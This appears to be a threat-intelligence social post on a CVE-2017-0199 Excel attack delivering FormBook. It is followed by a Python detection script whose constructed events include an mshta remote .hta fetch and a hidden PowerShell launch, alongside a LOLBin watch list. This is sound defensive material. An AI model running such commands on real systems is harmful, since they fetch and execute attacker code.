🚨 0-day vibes from 2017? Yup, it's still happening.
A malicious Excel file using CVE-2017-0199 is out here in 2025 dropping FormBook like it's a fresh mixtape.
The attack chain?
- Macro-free Excel
- Weaponized with remote .hta
- Payload: Info-stealer FormBook
Despite being 7+ years old, this vuln still slaps in phishing campaigns, because patching is apparently a myth.
Full technical breakdown by @FortiGuardLabs: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
TL;DR for blue teamers:
- Watch your egress traffic
- Harden Office apps
- Monitor LOLBins (Living Off the Land Binaries)
- Block outbound to shady IPs faster than your memes go viral
Don't let your org get dunked on by a 2017 CVE in 2025. That's not a good look.
#CyberSecurity #ThreatIntel #FormBook #CVE20170199 #Infosec #BlueTeam #MalwareAnalysis #HackerNews #Phishing
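
The "Monitor LOLBins" tip as triage logic over process-creation events, added here as an example (it is not from the post or the Fortinet write-up). The events are constructed, and the field names, LOLBin list and rule names are assumptions; the `-Embedding` rule assumes the .hta handler can be started through COM, so `mshta.exe` may not appear as a direct child of Excel.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
EVENTS = [
    {"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/update.hta"},
    {"host": "ws02", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe -Embedding"},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": 'EXCEL.EXE "C:\\Users\\a\\report.xlsx"'},
    {"host": "ws04", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden"},
]

# Assumed starting lists; tune them to the software actually deployed.
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the list of reasons this event deserves analyst attention."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    reasons = []
    if parent in OFFICE and image in LOLBINS:
        reasons.append("office-spawned-lolbin")
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            reasons.append("mshta-remote-url")
        # COM-activated mshta has no Office parent in the process tree.
        if "-embedding" in cmd.lower():
            reasons.append("mshta-com-activation")
    return reasons

def alerts(events):
    """Map host -> reasons for every event that matched at least one rule."""
    return {e["host"]: r for e in events if (r := triage(e))}

if __name__ == "__main__":
    for host, reasons in alerts(EVENTS).items():
        print(host, ", ".join(reasons))
```

Pair the `mshta` rules with egress logs for the same host and time window, since the remote .hta fetch is the step the post's "watch your egress traffic" tip would catch.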
